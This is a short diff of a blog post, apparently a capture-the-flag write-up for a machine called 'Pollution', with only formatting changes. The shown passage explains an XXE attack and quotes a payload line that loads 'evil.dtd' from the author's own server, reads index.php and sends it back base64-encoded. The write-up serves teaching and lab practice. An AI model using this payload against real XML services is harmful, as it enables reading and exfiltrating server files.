dumosuku/dumosuku.github.io/_posts/2023-03-14-Pollution.md

 Bingo we get a hit!
 All we need to do is base64 decode this data and we get the contents of `index.php`.

-> ❗️ Wait wait wait, what’s going on?
+> Wait wait wait, what’s going on?
 >
 > Let me try to explain what happened here.
 I sent in a valid post request utilizing an actual API request from earlier but appended the external entity into it.
 This is in the line: `<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.137/evil.dtd"> %xxe;]>`
 > This calls back to my webserver and loads in a file, `index.php` and sends it to my webserver again through the URL.
 So that base64 output you are seeing, that’s the `index.php` page encoded and sent straight back to me.
+{: .prompt-danger }

 ### Interesting Files